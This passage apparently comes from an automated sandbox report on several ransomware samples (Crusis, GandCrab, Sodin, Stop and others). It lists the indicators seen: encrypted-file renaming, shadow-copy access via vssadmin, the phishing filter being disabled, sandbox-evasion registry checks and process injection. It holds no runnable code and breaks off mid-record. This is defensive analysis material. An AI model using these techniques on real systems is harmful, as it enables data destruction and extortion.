Office\root\Office16\PAGESIZE\PGMN095.XML.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\ Trojan-Ransom.Win32.Blocker.jiqg-ebcb76212a57b469c83b1893f3b22c4199e8726495b057e2c45b3ce146f8d4cc.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 7392 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
pid pid_target Process procid_target 1208 4440 WerFault.exe 138 1624 2864 WerFault.exe 137 1648 3552 WerFault.exe 142 4032 3552 WerFault.exe 142 224 3552 WerFault.exe 142 5324 3552 WerFault.exe 142 5668 3192 WerFault.exe 152 5864 3552 WerFault.exe 142 5332 3192 WerFault.exe 152 5360 3552 WerFault.exe 142 8168 3192 WerFault.exe 152 7712 3552 WerFault.exe 142 7056 3192 WerFault.exe 152 7072 3552 WerFault.exe 142 3412 3192 WerFault.exe 152 9536 3552 WerFault.exe 142 9748 3192 WerFault.exe 152 8508 2828 WerFault.exe 155 7460 3552 WerFault.exe 142 12224 10624 WerFault.exe 239 10916 3192 WerFault.exe 152 12016 3552 WerFault.exe 142 9316 3192 WerFault.exe 152 9996 12188 WerFault.exe 250 7072 3192 WerFault.exe 152 12012 3552 WerFault.exe 142 10360 9680 WerFault.exe 260 9308 3552 WerFault.exe 142 5696 3192 WerFault.exe 152 11012 10128 WerFault.exe 271 6944 3552 WerFault.exe 142 1360 3192 WerFault.exe 152 7616 9640 WerFault.exe 280 10876 6384 WerFault.exe 292 2440 3192 WerFault.exe 152 7732 9640 WerFault.exe 280 11432 12200 WerFault.exe 308 12008 9640 WerFault.exe 280 8296 9640 WerFault.exe 280 9104 8308 WerFault.exe 298 10588 7576 WerFault.exe 321 9500 9640 WerFault.exe 280 1284 8308 WerFault.exe 298 7532 9640 WerFault.exe 280 7040 7428 WerFault.exe 331 11012 8308 WerFault.exe 298 4080 9640 WerFault.exe 280 7808 8308 WerFault.exe 298 6084 10964 WerFault.exe 347 8140 8308 WerFault.exe 298 10220 9640 WerFault.exe 280 10352 5944 WerFault.exe 355 11800 8308 WerFault.exe 298 6252 9640 WerFault.exe 280 9288 9400 WerFault.exe 362 9000 8308 WerFault.exe 298 928 9640 WerFault.exe 280 9780 7820 WerFault.exe 369 11640 9640 WerFault.exe 280 6196 8308 WerFault.exe 298 11848 9640 WerFault.exe 280 1604 5944 WerFault.exe 377 8068 8308 WerFault.exe 298 9176 9640 WerFault.exe 280 -
System Location Discovery: System Language Discovery 1 TTPs 42 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-c85c16d46f7830ad5afc138282399bb1de7b71e67d516e7c76973c54d187d906.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HPXmmgLUSavYuccxma5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Stop.in-488fc31a56df22ee62120505326df0699627525c17fbdde472437f447ba2b779.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.vho-5caad423df6fcb87b21006eabe45e3cb5dae1a5dba8f3b0c1a9e6ca0af350666.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.GandCrypt.jcc-45a2cc9060b21404632f07ee468d105ccd42075feb680f00d3aa1c20a19d272a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bmlplan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.adh-a8330e4e9ae277220a20ab4fd818495b3e6ff997f2a07215435d4f6262eccdcd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.abv-6e5f225b72d932fa68cafd3e0366298d5b1b92098049dcf01f6e3f2ad0f9b92e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HPXmmgLUSavYuccxma5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.mmug-b008c96b1ba6c13c4e922202baad57e199d9dee32a97a1443548c8a0ca303492.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.alx-f87cc35fedf1bcfa47f9df0d08bbc0d6741f46241a214dbdfa6b2ae6ac09068a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.bb-20684d3edd9d61bbe0a84559c8e197a02a123e697bc8d05bd9305cf1d3984c15.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tpvpyme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.jiqg-ebcb76212a57b469c83b1893f3b22c4199e8726495b057e2c45b3ce146f8d4cc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.GandCrypt.jes-79967e1aba8d8bd41f5fa97871f496ff3d7dcaf66d879d0134c6f9d056010697.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Stop.ln-c68ff2b64fe8310e584f0680e62c1283df48af9d09be486feaa820b57090e79c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb135d0764932501b0122620e2b7a7ca5b56786d1a937871372ae989609cc3f8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb135d0764932501b0122620e2b7a7ca5b56786d1a937871372ae989609cc3f8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.DigiPog.ep-fdbe5f69bb19bd05372847a7e3aa3196bfbd2cf620baec58bb8ac42c995a61ac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-481e96139f87e511669b713d5810b18682d9914699cc4f1f51f71ec12523bfa8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.MSIL.GandCrypt.f-5517c81c33300ed1d8771752b2ce39b47461c1246ecde81393df552a0b445e58.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.CryFile.zzl-d781d8a94e02093ccdb2e4b698582b3a1ea42b154829794b430f649fe12870f2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.GandCrypt.jdv-0d641a6e15a1b393fa49c6c2e98ada6e7a04a9163667f667d3776786515d0991.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.aaz-47e05f24669a0ffd7ca461aaf7e76e0b6e17f6cf424e4d854ddc584ee26ef42c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.ax-a8309e454d9177a8fe2c84c79925fa800282f9fde2413f219dbf60fc77dd37a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sicck.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bmlplan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Stop.kz-51279cf0dd0716de867e5bc706ef180f4ff1ed62e56c8a5858565408f41423c5.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 15 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Trojan-Ransom.Win32.GandCrypt.jdv-0d641a6e15a1b393fa49c6c2e98ada6e7a04a9163667f667d3776786515d0991.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Trojan-Ransom.Win32.GandCrypt.jes-79967e1aba8d8bd41f5fa97871f496ff3d7dcaf66d879d0134c6f9d056010697.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Trojan-Ransom.Win32.GandCrypt.jcc-45a2cc9060b21404632f07ee468d105ccd42075feb680f00d3aa1c20a19d272a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Trojan-Ransom.Win32.GandCrypt.jes-79967e1aba8d8bd41f5fa97871f496ff3d7dcaf66d879d0134c6f9d056010697.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Trojan-Ransom.Win32.GandCrypt.jcc-45a2cc9060b21404632f07ee468d105ccd42075feb680f00d3aa1c20a19d272a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Trojan-Ransom.Win32.GandCrypt.jcc-45a2cc9060b21404632f07ee468d105ccd42075feb680f00d3aa1c20a19d272a.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Trojan-Ransom.Win32.GandCrypt.jes-79967e1aba8d8bd41f5fa97871f496ff3d7dcaf66d879d0134c6f9d056010697.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Trojan-Ransom.Win32.GandCrypt.jdv-0d641a6e15a1b393fa49c6c2e98ada6e7a04a9163667f667d3776786515d0991.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Trojan-Ransom.Win32.GandCrypt.jdv-0d641a6e15a1b393fa49c6c2e98ada6e7a04a9163667f667d3776786515d0991.exe -
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 11452 vssadmin.exe 9628 vssadmin.exe -
Modifies Internet Explorer Phishing Filter 1 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\PhishingFilter msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\EnabledV8 = "0" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 = "0" msiexec.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\PhishingFilter msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\EnabledV8 = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 = "0" msiexec.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix bmlplan.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" bmlplan.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" bmlplan.exe -
Runs .reg file with regedit 2 IoCs
pid Process 8272 regedit.exe 10360 regedit.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 5016 powershell.exe 5016 powershell.exe 5016 powershell.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3648 7zFM.exe 836 taskmgr.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 380 HPXmmgLUSavYuccxma5.exe 1836 HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe 1836 HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 3648 7zFM.exe Token: 35 3648 7zFM.exe Token: SeSecurityPrivilege 3648 7zFM.exe Token: SeDebugPrivilege 1672 taskmgr.exe Token: SeSystemProfilePrivilege 1672 taskmgr.exe Token: SeCreateGlobalPrivilege 1672 taskmgr.exe Token: SeDebugPrivilege 836 taskmgr.exe Token: SeSystemProfilePrivilege 836 taskmgr.exe Token: SeCreateGlobalPrivilege 836 taskmgr.exe Token: 33 1672 taskmgr.exe Token: SeIncBasePriorityPrivilege 1672 taskmgr.exe Token: SeDebugPrivilege 5016 powershell.exe Token: SeDebugPrivilege 4104 HEUR-Trojan-Ransom.MSIL.Blocker.gen-481e96139f87e511669b713d5810b18682d9914699cc4f1f51f71ec12523bfa8.exe Token: SeDebugPrivilege 5096 Trojan-Ransom.MSIL.GandCrypt.f-5517c81c33300ed1d8771752b2ce39b47461c1246ecde81393df552a0b445e58.exe Token: 33 5096 Trojan-Ransom.MSIL.GandCrypt.f-5517c81c33300ed1d8771752b2ce39b47461c1246ecde81393df552a0b445e58.exe Token: SeIncBasePriorityPrivilege 5096 Trojan-Ransom.MSIL.GandCrypt.f-5517c81c33300ed1d8771752b2ce39b47461c1246ecde81393df552a0b445e58.exe Token: SeDebugPrivilege 3264 mmkt.exe Token: SeIncreaseQuotaPrivilege 5388 wmic.exe Token: SeSecurityPrivilege 5388 wmic.exe Token: SeTakeOwnershipPrivilege 5388 wmic.exe Token: SeLoadDriverPrivilege 5388 wmic.exe Token: SeSystemProfilePrivilege 5388 wmic.exe Token: SeSystemtimePrivilege 5388 wmic.exe Token: SeProfSingleProcessPrivilege 5388 wmic.exe Token: SeIncBasePriorityPrivilege 5388 wmic.exe Token: SeCreatePagefilePrivilege 5388 wmic.exe Token: SeBackupPrivilege 5388 wmic.exe Token: SeRestorePrivilege 5388 wmic.exe Token: SeShutdownPrivilege 5388 wmic.exe Token: SeDebugPrivilege 5388 wmic.exe Token: SeSystemEnvironmentPrivilege 5388 wmic.exe Token: SeRemoteShutdownPrivilege 5388 wmic.exe Token: SeUndockPrivilege 5388 wmic.exe Token: SeManageVolumePrivilege 5388 wmic.exe Token: 33 5388 wmic.exe Token: 34 5388 wmic.exe Token: 35 5388 wmic.exe Token: 36 5388 wmic.exe Token: SeDebugPrivilege 380 HPXmmgLUSavYuccxma5.exe Token: SeIncreaseQuotaPrivilege 5388 wmic.exe Token: SeSecurityPrivilege 5388 wmic.exe Token: SeTakeOwnershipPrivilege 5388 wmic.exe Token: SeLoadDriverPrivilege 5388 wmic.exe Token: SeSystemProfilePrivilege 5388 wmic.exe Token: SeSystemtimePrivilege 5388 wmic.exe Token: SeProfSingleProcessPrivilege 5388 wmic.exe Token: SeIncBasePriorityPrivilege 5388 wmic.exe Token: SeCreatePagefilePrivilege 5388 wmic.exe Token: SeBackupPrivilege 5388 wmic.exe Token: SeRestorePrivilege 5388 wmic.exe Token: SeShutdownPrivilege 5388 wmic.exe Token: SeDebugPrivilege 5388 wmic.exe Token: SeSystemEnvironmentPrivilege 5388 wmic.exe Token: SeRemoteShutdownPrivilege 5388 wmic.exe Token: SeUndockPrivilege 5388 wmic.exe Token: SeManageVolumePrivilege 5388 wmic.exe Token: 33 5388 wmic.exe Token: 34 5388 wmic.exe Token: 35 5388 wmic.exe Token: 36 5388 wmic.exe Token: SeBackupPrivilege 5592 vssvc.exe Token: SeRestorePrivilege 5592 vssvc.exe Token: SeAuditPrivilege 5592 vssvc.exe Token: SeDebugPrivilege 5656 HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3648 7zFM.exe 3648 7zFM.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 1672 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe 836 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1808 tpvpyme.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1672 wrote to memory of 836 1672 taskmgr.exe 97 PID 1672 wrote to memory of 836 1672 taskmgr.exe 97 PID 5016 wrote to memory of 1204 5016 powershell.exe 103 PID 5016 wrote to memory of 1204 5016 powershell.exe 103 PID 1204 wrote to memory of 4104 1204 cmd.exe 104 PID 1204 wrote to memory of 4104 1204 cmd.exe 104 PID 1204 wrote to memory of 4104 1204 cmd.exe 104 PID 1204 wrote to memory of 2272 1204 cmd.exe 105 PID 1204 wrote to memory of 2272 1204 cmd.exe 105 PID 1204 wrote to memory of 2272 1204 cmd.exe 105 PID 1204 wrote to memory of 4700 1204 cmd.exe 106 PID 1204 wrote to memory of 4700 1204 cmd.exe 106 PID 1204 wrote to memory of 4700 1204 cmd.exe 106 PID 1204 wrote to memory of 2424 1204 cmd.exe 107 PID 1204 wrote to memory of 2424 1204 cmd.exe 107 PID 1204 wrote to memory of 2424 1204 cmd.exe 107 PID 1204 wrote to memory of 1836 1204 cmd.exe 108 PID 1204 wrote to memory of 1836 1204 cmd.exe 108 PID 1204 wrote to memory of 1836 1204 cmd.exe 108 PID 4700 wrote to memory of 4476 4700 HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb135d0764932501b0122620e2b7a7ca5b56786d1a937871372ae989609cc3f8.exe 109 PID 4700 wrote to memory of 4476 4700 HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb135d0764932501b0122620e2b7a7ca5b56786d1a937871372ae989609cc3f8.exe 109 PID 4700 wrote to memory of 4476 4700 HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb135d0764932501b0122620e2b7a7ca5b56786d1a937871372ae989609cc3f8.exe 109 PID 1204 wrote to memory of 752 1204 cmd.exe 111 PID 1204 wrote to memory of 752 1204 cmd.exe 111 PID 1204 wrote to memory of 752 1204 cmd.exe 111 PID 2272 wrote to memory of 1808 2272 HEUR-Trojan-Ransom.Win32.Blocker.vho-5caad423df6fcb87b21006eabe45e3cb5dae1a5dba8f3b0c1a9e6ca0af350666.exe 112 PID 2272 wrote to memory of 1808 2272 HEUR-Trojan-Ransom.Win32.Blocker.vho-5caad423df6fcb87b21006eabe45e3cb5dae1a5dba8f3b0c1a9e6ca0af350666.exe 112 PID 2272 wrote to memory of 1808 2272 HEUR-Trojan-Ransom.Win32.Blocker.vho-5caad423df6fcb87b21006eabe45e3cb5dae1a5dba8f3b0c1a9e6ca0af350666.exe 112 PID 1204 wrote to memory of 5096 1204 cmd.exe 113 PID 1204 wrote to memory of 5096 1204 cmd.exe 113 PID 1204 wrote to memory of 5096 1204 cmd.exe 113 PID 1204 wrote to memory of 1948 1204 cmd.exe 114 PID 1204 wrote to memory of 1948 1204 cmd.exe 114 PID 1204 wrote to memory of 1948 1204 cmd.exe 114 PID 1204 wrote to memory of 2224 1204 cmd.exe 115 PID 1204 wrote to memory of 2224 1204 cmd.exe 115 PID 1204 wrote to memory of 2224 1204 cmd.exe 115 PID 1204 wrote to memory of 4300 1204 cmd.exe 116 PID 1204 wrote to memory of 4300 1204 cmd.exe 116 PID 1204 wrote to memory of 4300 1204 cmd.exe 116 PID 2224 wrote to memory of 380 2224 Trojan-Ransom.Win32.Blocker.mmug-b008c96b1ba6c13c4e922202baad57e199d9dee32a97a1443548c8a0ca303492.exe 117 PID 2224 wrote to memory of 380 2224 Trojan-Ransom.Win32.Blocker.mmug-b008c96b1ba6c13c4e922202baad57e199d9dee32a97a1443548c8a0ca303492.exe 117 PID 2224 wrote to memory of 380 2224 Trojan-Ransom.Win32.Blocker.mmug-b008c96b1ba6c13c4e922202baad57e199d9dee32a97a1443548c8a0ca303492.exe 117 PID 380 wrote to memory of 3796 380 